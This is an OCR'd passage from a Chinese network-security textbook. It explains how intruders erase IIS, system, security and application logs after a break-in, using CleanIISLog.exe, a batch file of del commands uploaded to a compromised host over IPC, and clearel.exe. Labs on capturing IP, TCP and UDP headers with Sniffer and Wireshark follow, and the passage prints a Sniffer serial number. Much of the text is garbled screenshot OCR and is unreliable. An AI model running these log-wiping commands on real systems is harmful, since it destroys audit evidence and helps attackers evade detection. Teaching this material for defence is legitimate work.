是 删除 全 部 文件 以 后 ,一定 会 引起 管理 员 的 怀疑 ,只 要 在 该 Log 文件 中 删除 所 有 自己 的 记 
录 就 可 以 了 。 

使 用 工具 软件 CleanIISLog. exe 可 以 做 到 这 一 点 。 首 先 将 该 文件 复制 到 日 志文 件 所 在 
目录 ,然后 执行 命令 CleanIISLog. exe ex031108. log 192. 168. 1. 10, 第 一 个 参数 ex031108. 
log 是 日 志文 件 名 ,文件 名 的 后 6 位 代表 年 月 日 ,第 二 个 参数 是 要 在 该 Log 文件 中 删除 的 IP 
地 址 ,也 就 是 自己 的 IP 地 址 。 先 查找 当前 目录 下 的 文件 ,然后 做 清除 的 操作 ,整个 清除 过 程 
如 图 8-36 所 示 。 


Ic: QUINT Ves test. od FL Lee SUC TDed 
驱动 器 5 中 的 着 是 wIN2000 
卷 的 序列 号 是 3778-1809 


C:\WINNT\system32\LogFiles\W3SUC12 的 目录 


[2003-09-10 07:11p «DIR» 

[2003-09-10 07:11p «DIR» m 

[2003-09-10 09:34p 485 ex030910.109 

[2003-11-30 10:13p 3,679 ex031108.109 

[2002-01-31 11:368 131,072 CleanIISLog.exe 
3 个 文件 135.236 FH 


2 个 目录 144,887,808 可 用 字 节 
[C:\WINNT\system32\LogFiles\W3SUC12)CleanIISLog.exe ex031108.109 172.18.25.110 


CleanIISLog Uer 0.1, by Assassin 2001. All Rights Reserved. 


zzzStep 15 s 
topping Service w3ouc. 
Service u3euc Stopped. 
Stopping Servic 
open Service Fa 


-LOG...Done (0000) Records Removed 


tep 
Starting up w3euc. 
Seruice u3suc Started. 
Restore Service 
2:::Done:- 


C: \WINNT\system32\LogFiles\W3SUC12> EH 
U 


图 8-36 删除 指定 的 IP 地 址 的 内 容 


对 于 本 地 日 志文 件 的 清除 与 上 述 相 同 。 如 果 是 一 名 黑客 ,入 侵 系 统 成 功 后 第 一 件 事 便 
是 清除 日 志 。 除 了 用 上 面 的 方法 清除 日 志 外 ,还 可 以 自己 编写 批 处 理 文件 来 解决 。 


@del?c:\winnt\system32\logfiles\ * . * 
@del?c:\winnt\system32\config\ * . evt 
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@del?c:\winnt\system32\dtclog\ * . * 

(Qdel?c:NwinntVsystem32N * . log 

@del?c:\winnt\system32\ * . txt 

@del?c:\winnt * . txt 

@del?c:\winnt * . log 

@del?c:\dellog. bat 

把 上 面 的 内 容 保存 为 dellog. bat 备用 。 接 着 通过 IPC 共享 连接 到 远程 计算 机 上 ,将 这 
个 批 处 理 文件 上 传 到 远程 计算 机 系统 并 执行 , 即 可 清除 肉鸡 上 的 日 志文 件 。 

另外 ,清除 日 志文 件 还 可 以 借助 第 三 2 比如 小 榕 的 elsave. exe 就 是 一 款 可 以 清除 
远程 以 及 本 地 系统 中 系统 日 志 、 应 用 程序 日 志 、 安 全 日 志 的 软件 。elsave. exe 使 用 起 来 很 简 
单 , 首 先 还 是 利用 管理 员 账号 建立 ee palacii 
除 这 些 系统 中 的 网 络 日 志文 件 。 
8.5.2 清除 主机 日 志 

主机 日 志 包 括 三 类 日 志 : 应 用 程序 日 志 、 安 全 日 志和 系统 日 志 。 可 以 在 计算 机 上 通过 
控制 面板 下 的 “事件 查看 器 "查看 日 志 信息 ,如 图 8-37 所 示 。 

EE " sei xt 


[T sv |e » | me [2 EB | i9 
EOE 77 个 事件 


19:54:30 


19:54:02 
17:07:24 
17:07:17 
17:07:16 
16:27:21 


图 8-37 查看 日 志 


使 用 工具 软件 clearel. exe, 可 以 方便 地 清除 系统 日 志 。 首 先 将 该 文件 上 传 到 对 方 主机 ， 
然后 删除 这 三 种 日 志 的 命令 格式 为 : 


Clearel System 删除 系统 日 志 
Clearel Security 删除 安全 日 志 
Clearel Application ”删除 应 用 程序 日 志 
Clearel All 删除 全 部 日 志 


命令 执行 的 过 程 如 图 8-38 所 示 。 


c: »Clearel System 
(c: VoClearel Security 
c: »Clearel Application 


C: »Clearel A11 


[C:\> 


图 8-38 清除 日 志 
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执行 完毕 后 ,再 打开 “事件 查看 器 ” ,发 现 都 已 经 清空 了 ,如 图 8-39 所 示 。 


旧事 件 查 看 器 -loj xl 
| wf zzv | e 9 | m | [| 
树 | 应 用 程序 日 志 0 个 事件 


事件 查看 器 (本 地 ) 
pietas] 
BI SH 


图 8-39 查看 清除 后 的 日 志 


j 题 


一 、 填空 题 
1. DoS 攻击 的 目的 是 和 ,最 著名 的 后 门 程序 


是 


2. 木马 程序 一 般 包 含 两 个 程序 文件 ,一 个 是 , 另 一 个 是 

3. RTCS. vbe 工具 软件 的 功能 是 

4. NTLM 身份 验证 选项 有 三 个 值 。 默 认 是 ,用 Telnet 登录 时 ,用 的 值 是 
和 

5. 记录 管理 员 口 令 修 改 的 软件 是 

6. Windows 系统 的 日 志文 件 有 $ 和 

7. 删除 全 部 日 志 的 命令 是 

二 、 简 答题 
. 简 述 木马 的 由 来 ,并 简 述 木马 和 后 门 的 区 别 和 联系 。 

2. 如 何 删除 系统 日 志 、 安 全 日 志 、 应 用 程序 日 志 ? 

3. 如 何 开启 要 攻击 机 器 的 终端 服务 ? 


第 9 章 实 验 


本 章 共 包括 37 个 实验 ,要 很 好 地 完成 这 些 实验 ,应 注意 操作 系统 的 选择 ,做 实验 的 目的 
就 是 更 好 地 理解 相应 的 理论 知识 。 


实验 1 Sniffer 和 Wireshark 工具 软件 的 使 用 


一 、 实 验 目的 


掌握 和 了 解 网 络 监听 抓 包 软 件 Sniffer 和 Wireshark 的 基本 应 用 ,熟悉 它们 的 基本 
操作 。 
熟悉 Sniffer 和 Wireshark 一 些 常用 的 命令 和 设置 ,体会 网 络 安全 的 重要 性 。 
二 、 实 验 所 需 软 件 
客户 机 操作 系统 : Windows XP.IP 地 址 为 192. 168. 2. 1。 
服务 器 操作 系统 : Windows Server 2008/Windows XP.IP 地 址 为 192. 168. 2.2. 
抓 包 软 件 : Sniffer 4. 7. 5/wireshark-win32-1. 4. 9 中 文 版 。 


实验 时 ,如 果 没 有 两 台 机 器 ,可 以 使 用 虚拟 机 ,在 虚拟 机 下 安装 服务 器 Windows 2000 
Advance Server/Windows XP。 也 可 以 把 客户 机 和 服务 器 同时 安装 到 虚拟 机 下 。 


三 、 实 验 步 骤 


1. Sniffer 

1) 安装 

在 客户 机 上 双击 如 图 9-1 所 示 SnifferPro_4_70_530. exe 开始 安装 ,安装 界面 如 
图 9-2 所 示 ,安装 过 程 如 图 9-3 所 示 。 在 安装 过 程 中 必须 输入 一 个 带 “@” 的 E-mail 和 SN 
序列 号 ,如 图 9-4 和 图 9-5 所 示 , 其 他 内 容 按 照 需要 输入 即 可 ,安装 完成 后 需要 重新 启动 


机 器 。 
SnifferPro 4 70 ... 
3 Sniffer Portable. 
S Network Associat 


图 9-1 SnifferPro 的 安装 图 标 


2) 启动 

启动 Sniffer 的 界面 如 图 9-6 所 示 , 抓 包 之 前 必须 首先 设置 要 抓 取 的 数据 包 的 类 型 。 选 
择 主 菜单 Capture. 下 的 Define Filter( 抓 包 过 滤器 ) 菜 单项 ,如 图 9-6 所 示 。 

在 出 现 的 Define Filter 对 话 框 中 ,选择 Address 选项 卡 , 修 改 几 个 地 方 : 在 Address 下 
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T. Sniffer Portable 4.7.5 — InstallShield Wizard 


Welcome to the InstallShield Wizard 
for Sniffer Portable 4.7.5 


The InstallShield Wizard(TM) wil help install Sniffer Portable 
4.7.5 0n your computer. To continue, dick Next. 


9-2 SnifferPro 的 安装 界面 


iffer Pro 4.7. 


* Business 
* 
* Custoner 


* E-mail 


[shinabeijing 


[kexc01 


Education 


12348qq. con 


in 


图 9-4 输入 带 “@ "的 E-mail 
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* Please let us know where you 


heard about this product esazine ad 


Do you wish to receive ra 


announcements about this 
Product? 


May we share your name with 
other companies that use RAI 
products? 


h “Sniffer Serial Number 54-25581-255T9-2LASH. 


«r-59 取消 


图 9-5 输入 序列 号 


Sniffer Portable - Local, Ethernet (Line speed at 10 Mbps) 


Hile Monitor è 

pl ul mja Siet 
Slaj Sli 5: 
Capture Panel 


D sann | 


Select Filte”. 


Trigger Setup. 


图 9-6 Sniffer 主 界面 


拉 列 表 中 ,选择 抓 包 的 类 型 为 IP, 在 Stationl 下 输入 客户 机 的 IP 地 址 192. 168. 2. 1， 
Station2 下 输入 服务 器 的 IP 地 址 192. 168. 2.2, 如 图 9-7 所 示 。 


efine Filter - Capture 


Summary Address | Data Pattern | Advanced | Buffer | siais 
Máress Known Address: Mragable) 


Mode 8 B Broadcast/Multicast Address 
G Include QD Address Book 
C Exclude 


国 

1 

w 
区 


图 9-7 选择 抓 包 地 址 


设置 完毕 后 , 单 击 Advanced 标签 ,选中 要 抓 包 的 类 型 , 拖 动 滚动 条 找到 TP 项 ,将 IP 和 
ICMP 选中 ,如 图 9-8 所 示 。 

向 下 拖 动 滚动 条 ,将 TCP 和 UDP 选中 ,再 把 TCP 下 面 的 FTP 和 Telnet 两 个 选项 选 
中 ,如 图 9-9 所 示 。 


182 计算 机 网 络 安全 与 实验 教程 (第 二 版 ) 


Define Filter — Capture 


IGRP/EIGRP 
IP-VIMES 
ISO-IP4 


T 
r 
r 
F 
r 
r 
r 
r 


Packet Size 


Packet Type 


rm [Normal 
[CRC Error 
AI sizes [vJabber ] 


CE ] mm | Profiles 


图 9-8 选择 IP 和 ICMP 


Define Filter — Capture 


Summary | Address | Data Pattern Advanced | Buffer | Settings For: 
Default 


10000000 


Packet Size 


取消 | Profiles.. 


图 9-9 选中 FTP 和 Telnet 
继续 拖 动 滚动 条 ,选中 UDP 下 面 的 DNS, 如 图 9-10 所 示 。 这 样 Sniffer 的 抓 包 过 滤器 
就 设置 完毕 了 。 


Define Filter — Capture 


Sanmary | Address | Data Pattern Advanced | Buffer | 


SMTP 
SUNRPC (TCP) 
Iv S TELET 
DSa -rumor 
c R3) wr 
[Cs rrr 
Ces sore 


Iv 2s nis (vn?) 
GDP 


Packet Size p Packet Type 

m | ormal 
Error 

AM sizes Jabber 


CE] m | Pofiles. 


9-10 选中 DNS 
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3) 抓 包 
首先 选择 菜单 Capture 下 的 Start 命令 启动 抓 包 ,如 图 9-11 所 示 。 


二 Sniffer Portable - Local, Ethernet (Line speed at 10 Nbps) 


Window Help 


Capture Panel 


Define Filter. 
Select Filter. 


Trigger Setup 


911 启动 抓 包 


然后 在 主机 “开始 ”菜单 下 运行 CMD 命令 ,进入 DOS 窗口 ,在 客户 机 DOS 窗口 中 ping 
虚拟 机 服务 器 ,如 图 9-12 所 示 。 


NDOWS\systen32\ 


Microsoft Windows XP [版 本 5.1.2600] 
<O 版 权 所 有 1985-2001 Microsoft Corp. 


C:\Documents and Settings idministrator>ping 192.168.2.2 
Pinging 192.168.2.2 with 32 bytes of data: 


Reply from 192.168.2 LI 2 tine-4ms TTL=128 
Reply from 192.168.2.2: bytes-32 tineims IIL=128 
Reply m 192.168.2. 2 timeXims TTL-128 
Reply from 192.168 -2 time<lms TTL-128 


Ping statistics for 192. : 
Packets: Sent = 4, Received = 4, Lost = Ø (0x los 
Approximate round trip n in milli-seconds: 
Minimum = gmns。 Maximum = dms, Average = ims 


NDocuments and Settings Administrator) 


9-12 ”从 服务 器 向 客户 机 发 送 数据 包 


ping 指令 执行 完毕 后 ,选择 菜单 Capture 下 的 Stop and Display 命令 或 单 击 轿 按钮 停 
止 并 显示 ,如 图 9-13 所 示 。 


Sniffer Portable - Local, Ethernet (Line speed at 10 Ebps) 


Capture Panel 


Trigger Setup. 


图 9-13 停止 抓 包 并 显示 结果 
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在 出 现 的 窗口 中 选择 Decode 选项 卡 ,可 以 看 到 数据 包 在 两 台 计 算 机 之 间 的 传递 过 程 ， 
如 图 9-14 所 示 。 


Ii Beitr Deuter Dale Dele Dade Nine dy 
sl uj ajajaa) [fossa 可 | 
zu) 13| Ginsizie lm lel 


n 
pst 
i 


En 
j24 | 0.00.03 004| 0.000 .159| 2014-9; 
cce otiak = 

Tine to live 


图 9-14 数据 包 传递 过 程 
2. Wireshark 


D 安装 
双击 如 图 9-15 所 示 wireshark-win32-1. 4. 9 中 文 版 安装 。 全 部 按照 默认 安装 ,如 图 9-16 
和 图 9-17 所 示 。 


wireshark cn.zip VinRAR 


文件 中 命令 CC) IAO KERO AAW 帮助 中 


SOED5buT?SEARI 


E ER 
; 图 CBE, inea en zip - ZIP 压缩 文件 ， 解 包 大 小 为 19, 903, 865 FP 

名 称 9 
a 


大 小 压缩 后 大 小 


ai 


m 


E3-u 已 经 选择 19, 903, 865 FP U 个 文件 ) 


J 
总 计 19,903,965 FP U 个 文件 ) 


图 9-15 安装 文件 
2) 启动 


安装 后 直接 启动 ,在 菜单 栏 “ 抓 包 ? 选 项 中 选择 * 抓 包 参 数 选择 ?命令 ,如 图 9-18 所 示 , 设 
置 抓 包 选 项 ,如 图 9-19 所 示 。 
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Wireshark 1.4.9haochj (32-bit) Setup 


Choose Install Location 
Choose the folder in which to install Wireshark 1.4.9haochj (32-bit). 


Choose a directory in which to install Wireshark. 


9-16 选择 安装 的 路 径 


Wireshark 1.4.9haochj (32-bit) Setup 


installation Complete. 
Setup was completed successfully. 


Completed 


Output folder: C:\Program Fes Wireshark 
Extract: mergecap.exe 

Extract: mergecap.html 

Output folder: C:\Program Fies Wireshark 
Extract: capinfos.exe 

Extract: capinfos.htmi 

Output folder: C:\Program Files Wireshark 
Extract: rawshark.exe 

Extract: rawshark.html 


9-17 ”安装 过 程 


The Wireshark Network Analyzer 
XFO 编辑 下) NDV 定位 (6) El HV ixi) 电信 人 IAW HUW 


|ù & a à e A X E eno u Eg) aaan aam 
"e |,  BELZILDESENNUSTI —— o 


ai x E 
M 选择 抓 包 过 小 器 人) 


图 9-18 选择 抓 包 参 数 
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Wireshark: 择 包 选 项 
ma 
接口 : [ria | [AMD PCNET Fanily Ethernet Adapter: \Device\NPF_{D39FALA]Cr ) 
TP 地 址 :192. 168.2. 1 
链 路 层 头 类 型 : | Ethernet M 
[v] 在 混乱 模式 下 抓 包 - 
抓 职 PCAP- NG 格式 的 数据 包 实验) 
限制 每 一 包 Q) 


yexEcx][ - 
iex 
文件 : | 


E] 使 用 多 个 文件 名 
T—M 


bytes 


WED 


BENDE BONS 
名 宇 解析 
(v] 允许 使 用 MAC 名 字 解 析 QD 


O 允许 使 用 网 络 名 字 解 析 QD 


iv] 允许 使 用 传输 名 字 和 解析 CD 


图 9-19 抓 包 选 项 
3) 抓 包 和 监听 


单 击 “ 开 始 ” 按 钮 ,就 可 以 抓 到 所 有 的 数据 包 了 ,然后 在 “ 抓 包 过 滤 ” 中 填写 想得到 的 


数据 包 , 比 如 TCP, 然 后 单 击 右面 的 “应 用 ”就 可 以 显示 抓 到 的 TCP 的 数据 包 了 ,如 图 9-20 
所 示 。 


XM müp ABY Xu MOP 
【 a ruxca& 
xe 


-ex o € — SR 
CHE les 


W RHD "Hi IAD Wb 
\+t+oF2ż Bm aaan ans g 


462 100.715461 22230.227.226 115.35.21632 


parat > hep {FIN, ACK] Seq=440 Ack= 159 Wn=65398 Len=0 


501 192.168.2.2 
90 192.168.2.1 


ED 


ar 


920 ”得 到 TCP 的 数据 包 
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实验 2 运用 ping 抓 取 IP 结构 


一 、 实 验 目的 


认识 ping 命令 .了解 和 掌握 IP 头 结构 的 含义 。 学 习 IP 头 结构 。 查 看 IP 数据 包 的 结 
FJ. rft IP 协议 在 网 络 层 的 应 用 。 


二 、 实 验 所 需 软件 


客户 机 操作 系统 : Windows XP,IP 地 址 为 192. 168. 2. 1 。 

服务 器 操作 系统 : Windows Server 2008/Windows XP,IP 地 址 为 192. 168. 2. 2. 

抓 包 软 件 Sniffer4. 7. 5/Wireshark-win32-1. 4. 9 中 文 版 。 

实验 时 ,如 果 没 有 两 台 机 器 ,可 以 使 用 虚拟 机 ,在 虚拟 机 下 安装 服务 器 Windows 2000 
Advance Server/Windows XP。 也 可 以 把 客户 机 和 服务 器 同时 安装 到 虚拟 机 下 。 


三 、 实 验 步 又 


CD 启动 并 设置 抓 包 软件 Sniffer( 同 实验 
(2) 然后 启动 开始 抓 包 。 随 后 在 主机 “开始 ”菜单 下 运行 CMD 命令 ,进入 DOS 窗口 ,在 
客户 机 DOS 界面 下 ping 虚拟 机 服务 器 ,如 图 9-21 所 示 。 


所 有 1985-2001 Microsoft Corp. 


IC: Documents and Settings dninistrator ping 192.168.2.2 
Pinging 192.168.2.2 with 32 bytes of data: 

Reply fron 192.168.2.2: byt: tine=4ns TTL-128 

Reply from 192.168.2.2: byt: tine<ims T 8 

[Reply fron 192.168.2.2: byt tineXins TTL=128 

Reply from 192.168.2.2: bytes=32 tine<ims TTL=128 


for 192.168.2 


Approximate round trip time 
Minimum = Üns, Maximum = 4ns, Average = ins 


[C:\Documents and Settings Midministrator> 


图 9-21 从 主机 向 虚拟 机 发 送 数 据 包 


(3) 停止 并 显示 。 在 出 现 的 窗口 中 选择 Decode 选项 卡 ,可 以 看 到 数据 包 在 两 台 计 算 机 
之 间 的 传递 过 程 ,如 图 9-22 所 示 。 
Sniffer 已 将 ping 命令 发 送 的 数据 包 成 功 获取 。 可 以 得 到 IP 头 结构 如 图 9-23 所 示 。 
IP 报头 的 所 有 属性 都 在 报头 中 显示 出 来 ,可 以 看 出 ,实际 抓 取 的 数据 报 和 理论 上 的 数据 报 
- 致 。 
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Iüe Weiter Cote Disploy Dele Datdbere Yide Belp 


s| u| a'la] £| [per 本 
alul 52| &lsizieimislea 2| el s| 


0:00:01 003 
0:00: 01-003 
0 00.02 004| 1 001.187 
HRIH 
3 004 
3 004| 0.000.159) 


图 9-22 数据 包 传递 过 程 


bytes 版 本 号 
优先 权 、 最 小 延迟 、 最 大 春 吐 量 、 最 高 可 篆 性 


志 位 、 没 有 使 用 IP 协 议 、DF 为 0 表示 
要 分 段 、MF 为 0 表示 没有 进一步 分 段 、 
分 段 偏 移 


ps 生存 时 间 


rrect SUA 
192.168.2.1 ] 源 地 址 
192.168.2.2 1 目标 地 址 


gt 


图 9-23 IP 报头 解析 


实验 3 运用 FTP 命令 抓 取 TCP 头 结构 
一 、 实 验 目的 


掌握 FTP 服务 器 的 搭建 方法 ,FTP 的 使 用 。 
学 习 传输 控制 协议 TCP, 分 析 TCP 的 头 结 构 和 TCP 的 工作 原理 ,观察 TCP 的 “三 次 握 
手 ” 和 “四 次 挥手 ”。 


二 、 实 验 所 需 软件 
客户 机 操作 系统 : Windows XP,IP 地 址 为 192. 168. 2. 1 。 
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服务 器 操作 系统 : Windows Server 2008/Windows XP,IP 地 址 为 192. 168. 2. 2, 

抓 包 软件 : Sniffer 4.7.5。 

实验 时 ,如 果 没 有 两 台 机 器 ,可 以 使 用 虚拟 机 ,在 虚拟 机 下 安装 服务 器 Windows 2000 
Advance Server/Windows XP。 也 可 以 把 客户 机 和 服务 器 同时 安装 到 虚拟 机 下 。 


三 、 实 验 步 又 


COD 首先 在 服务 器 上 搭建 FTP 服务 ,如 图 9-24 所 示 ,选择 默认 的 FTP 站 点 , 右 击 选择 
“属性 ”, 如 图 9-25 所 示 。 


图 9-24 打开 Internet 服务 管理 器 


单 击 “FTP 站 点 ”标签 ,服务 器 的 IP 地 址 为 192. 168. 2. 2, 所 以 在 默认 FTP 属性 对 话 框 
中 将 IP 地 址 选择 为 192. 168. 2. 2, 如 图 9-26 所 示 。 

(2) 在 客户 机 上 连接 服务 器 的 FTP 服务 : 在 客户 机 上 启动 Sniffer( 其 配置 同 实验 1)， 
然后 在 DOS 命令 下 使 用 FTP 指令 连接 服务 器 的 FTP 服务 器 ,如 图 9-27 所 示 。 

默认 情况 下 ,FTP 服务 器 支持 匿名 访问 ,输入 的 用 户 名 是 “ftp”, 密 码 是 “ftp”。 退 出 对 
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Internet 信息 服务 


so sv ||e-|g[m|E |i || &S| » mn 


| 计算 机 | 本 地 |「 连接 类 型 


Inema ES |B* adserver 是 TCP/IP 
BÀ * adserver 


E vi 资源 管理 器 
ma uev FH 
EA. ERAS D 
t ERU NI 
司 动 
停止 
暂停 


weno 
所 有 任务 (0 Y 
BR) 
BINO 


SB) 


图 9-25 开启 FTP 服务 


FTP 


[13 Aix 
FTP 站 点 | 安全 帐号 | 消息 “| 主 目录 | 目录 安全 性 | 
标识 
E 
| RAD 
IP Hhhb CD 
TCF WO T) 


[连接 
| CARD 

| C BERSERI QD - 100,000 | 连接 
| 连接 要 时 C [— — — —3s 秒 


Tv 启用 日 志 记录 D 
活动 日 志 格式 W: 


| Insc 扩充 日 志文 件 格式 了 | Bü... 
ELLE 


Cae ] mm mmo) | 。 am 


图 9-26 选择 IP 地 址 


:NDocunents 
Connected to 


ion 5.8). 
.2:€none)?: ftp 


allowed, send identity (e-mail name) as pa: 


:NDocuments and Settin dninistrator? 


图 9-27 连接 服务 器 的 FIP 服务 
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方 的 FTP 使 用 的 命令 是 bye。 停 止 Sniffer, 查 看 抓 取 的 FTP 会 话 过 程 ,如 图 9-28 所 示 。 


Anonynous access allo 
AC 224072353. VIN« 1739 


330 Ancayacus user. 
"AC 224072399. ETN- 1236 
gui 


~ (No urgent pointer) 
= (Hio scknoviedgnent) 


Hio 28 捕捉 FTP 的 会 话 过 程 


(3) 观察 抓 取 到 的 TCP 的 三 次 握手 和 四 次 挥手 的 过 程 。 握 手 过 程 如 图 9-29 一 图 9-31 
所 示 。 

第 一 次 握手 : 由 客户 机 的 应 用 层 进程 向 其 传输 层 TCP 发 出 建立 连接 的 命令 , 则 客户 机 
TCP 向 服务 器 上 提供 某 特 定 服务 的 端口 发 送 一 个 请 求 建立 连接 的 报 文 段 ,该 报 文 段 中 SYN 
被 置 1, 同 时 包含 一 个 初始 序列 号 z( 系 统 保持 着 一 个 随时 间 变 化 的 计数 器 ,建立 连接 时 该 计 
数 器 的 值 即 为 初始 序列 号 ,因此 不 同 的 连接 初始 序列 号 不 同 ) 。 


图 9-29 第 一 次 握手 


第 二 次 握手 : 服务 器 收 到 建立 连接 的 请 求 报 文 段 后 ,发 送 一 个 包含 服务 器 初始 序号 vy. 
SYN 被 置 1 ,确认 号 置 为 zx 十 1 的 报 文 段 作为 应 答 。 确 认 号 加 1 是 为 了 说 明 服务 器 已 正确 收 
到 一 个 客户 连接 请 求 报 文 段 ,因此 从 逻辑 上 来 说 ,一 个 连接 请 求 占用 了 一 个 序号 。 
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图 9-30 第 二 次 握手 


第 三 次 握手 : 客户 机 收 到 服务 器 的 应 答 报 文 段 后 ,也 必须 向 服务 器 发 送 确认 号 为 y 十 1 
的 报 文 段 进行 确认 。 同 时 客户 机 的 TCP 层 通 知 应 用 层 进 程 连接 已 建立 ,可 以 进行 数据 传输 
了 。 完 成 三 次 握手 ,客户 端 与 服务 器 开始 传送 数据 。 


图 9-31 第 三 次 握手 


四 次 挥手 过 程 如 图 9-32 一 图 9-35 所 示 。 

第 一 次 挥手 : 由 客户 机 的 应 用 进程 向 其 TCP 层 发 出 终止 连接 的 命令 , 则 客户 TCP 层 
向 服务 器 TCP 层 发 送 一 个 FIN 被 置 1 的 关闭 连接 的 TCP 报 文 段 。 

第 二 次 挥手 : 服务 器 的 TCP 层 收 到 关闭 连接 的 报 文 段 后 ,就 发 出 确认 ,确认 号 为 已 收 
到 的 最 后 一 个 字 节 的 序列 号 加 1, 同 时 把 关闭 的 连接 通知 其 应 用 进程 ,告诉 它 客户 机 已 经 终 
止 了 数据 传送 。 在 发 送 完 确认 后 ,服务 器 如 果 有 数据 要 发 送 , 则 客户 机 仍然 可 以 继续 接收 数 
据 , 因 此 把 这 种 状态 叫 半 关 闭 (Half-close) 状 态 ,因为 服务 器 仍然 可 以 发 送 数据 ,并 且 可 以 收 
到 客户 机 的 确认 ,只 是 客户 方 已 无 数据 发 向 服务 器 了 。 


第 
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E TCP 


TCP 


Source port 


21 (FTP-ctrl) 


TCP: Destination port - 1035 

TCP: Sequence nunber 244623595 

TCP: Next expected Seq nunber= 244623596 

TCP: Acknowledgnent number = 30127006 

TCP: Data offset = 20 bytes 

TCP: Reserved Bits: Reserved for Future Use (Not shown in the Hex Dunp) 
TCP: Flags = 11 

TCP 0. .... = (No urgent pointer) 

TCP 1 = Acknovledgnent 


TCP (No push) 

TCP (No reset) 
TCP * (No SYN) 

TCP 1 = FIN 

TCP: Window = 17497 

TCP: Checksum = 911C (correct) 
TCP: Urgent pointer =0 


No TCP options 


9-32 第 一 次 挥手 


下 == 一 一 一 


TCP 
TCP: Source port = 1035 

TCP: Destination port = 21 (FTP-ctzl) 

TCP: Sequence number - 30127006 

TCP: Next expected Seq nuxber- 30127006 

TCP: Acknowledgment number = 244623596 

TCP: Data offset = 20 bytes 

TCP: Reserved Bits: Reserved for Future Use (Not shown in the Hex Dunp) 
TCP: Flags - 10 

TCP 0 = (No urgent pointer) 

TCP 1 = Àcknowledgment 

TCP 0... = (No push) 

TCP 0.. = (No reset) 

TCP 0. = (No SYN) 

TCP 0 = (No FIN) 

TCP: Window = 17362 

TCP: Checksun = 9143 (correct) 

TCP: Urgent pointer -0 

TCP: No TCP options 

TOR 


图 9-33 第 二 次 挥手 


第 三 次 挥手 : 如 果 服 务 器 应 用 进程 也 没有 要 发 送 给 客户 方 的 数据 了 ,就 通告 其 TCP 层 
关闭 连接 。 这 时 服务 器 的 TCP 层 向 客户 机 的 TCP 层 发 送 一 个 FIN 置 1 的 报 文 段 , 要 求 关 
闭 连接 。 


Source port 1035 
Destination port = — 21 (FTP-ctrl) 
Sequence number * 30127006 
Next expected Seq nunber= 30127007 
Acknowledgment number = 244623596 
Data offset * 20 bytes 
Reserved Bits: Reserved for Future Use (Not shown in the Hex Dump) 
Flags = il 
0 = (No urgent pointer) 
1 = Acknowledgment 
0 = (No push) 
0.. = (No reset) 
0. = (No SYN) 
1 - FIN 
Window = 17362 
Checksun * 91à2 (correct) 
Urgent pointer = 0 


No TCP options 


图 9-34 第 三 次 挥手 
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第 四 次 挥手 : 同样 ,客户 机 收 到 关闭 连接 的 报 文 段 后 ,向 服务 器 发 送 一 个 确认 ,确认 号 
为 已 收 到 数据 的 序列 号 加 1。 当 服务 器 收 到 确认 后 ,整个 连接 被 完全 关闭 。 


TCP: Source port = 1035 
TCP: Destination port = 21 (FTP-ctrl) 
TCP: Sequence number = 30126983 
TCP: Next expected Seq number= 30126983 
TCP: Àcknovledgment number 7 244623437 
TCP: Data offset = 20 bytes 
TCP: Reserved Bits: Reserved for Future Use (Not shown in the Hex Dump) 
TCP: Flags - 10 
TCP 0 = (No urgent pointer) 
TCP ont = Acknowledgnent 
TCP 0 = (No push) 
TCP $ 0 = (No reset) 
TCP 0. = (No SYN) 
TCP 0 = (No FIN) 
TCP: Vindow = 17520 
TCP: Checksum * 91BB (correct) 
TCP: Urgent pointer = 0 
TCP: No TCP options 
TCP 
图 9-35 第 四 次 挥手 
a> M 
实验 4 抓 取 UDP 的 头 结构 
一 、 实 验 目 的 
利用 DNS 抓 取 UDP 的 头 结构 ,比较 UDP 和 TCP 的 不 同 点 。 
二 、 实 验 所 需 软 件 


客户 机 操作 系统 : Windows XP,IP 地 址 为 192. 168. 2. 1 。 

服务 器 操作 系统 : Windows Server 2008/Windows XP,IP 地 址 为 192. 168. 2. 2。 

抓 包 软件 : Sniffer 4. 7. 5. 

实验 时 ,如 果 没 有 两 台 机 器 ,可 以 使 用 虚拟 机 ,在 虚拟 机 下 安装 服务 器 Windows 2000 
Advance Server/Windows XP。 也 可 以 把 客户 机 和 服务 器 同时 安装 到 虚拟 机 下 。 


三 、 实 验 步 骤 


(1) 首先 为 客户 机 设置 DNS 服务 地 址 。 这 里 将 客户 机 的 DNS 服务 地 址 设 为 192. 168. 
2.2, 即 客户 机 的 DNS 服务 地 址 指向 服务 器 ,如 图 9-36 所 示 。 

(2) 然后 启动 Sniffer( 设 置 同 实验 1) ,已 知 只 要 访问 DNS 都 可 以 抓 到 UDP 数据 报 ,所 
以 在 启动 抓 包 后 ,在 主机 的 DOS 界面 下 输入 命令 “nslookup”, 如 图 9-37 所 示 ,或 者 浏览 一 
个 网 页 也 可 以 ,只 要 应 用 了 DNS, 就 可 以 抓 到 UDP 的 报头 。 

(3) 查看 Sniffer 抓 取 的 数据 包 , 可 以 看 到 UDP 报头 ,如 图 9-38 所 示 。 

可 以 看 出 UDP 的 头 结构 比较 简单 。UDP 提供 的 是 非 连接 的 数据 报 服务 ,意味 着 UDP 
无 法 保证 任何 数据 报 的 传递 和 验证 。UDP 和 TCP 传递 数据 的 比较 如 表 9-1 所 示 。 
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设置 。 SN. 


〇 自动 获得 Ir 地 址 四 ) 

DEATH 1f WEG) 

IP HED 192 .168. 2 . 1 
FAMU 
默认 网 关中 ) 


255 


Q 使 用 下 面 的 DRS 服务 器 地 址 E) 
wt dq Beso 1G 388 2 2 
备用 DNS S390 


图 9-36 设置 DNS 解析 主机 


TNDOWS\systema32Ncad exe 


icrosoft Windows XP [RÆ 5.1.2600] 


所 有 1985-2001 Microsoft Corp. 


ents and Settings Ndninistratornslookup 


[DNS request tined out. 
timeout was 2 secon 

=*=» Can’t find server nane for address 192.168.2.2: Timed out 

=x» Default servers are not available 


UnKnown 


Decode, 1/3 Unkn 


192.168.2.1] 
192. 


lab: Time 
20] 
0:00:17.762| 0 — 20) 


Flags 。 01 
o = Command 
000 0 * Query 


Flags = 0X 
Question count 


Answer count 
Authority count 


ZONE Section 


Additional record count 


1034 


53 (Domain: 


0. = Not truncated 
1 * Recursion desired 


0 * Non Verified data NOT acceptable 


Wane = 2 .2.168 192 in-addr arpa 
Type * Domain name pointer (PTR,12) 
Cless - Internet (IN.1) 


图 9-38 得 到 UDP 数据 报 
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表 9-1 UDP 和 TCP 传递 数据 的 比较 


UDP TCP 
无 连接 的 服务 ; 在 主机 之 间 不 建立 会 话 面向 连接 的 服务 ; 在 主机 之 间 建 立会 话 
TCP 通过 确认 和 按 顺 序 传 递 数 据 来 确保 数据 的 


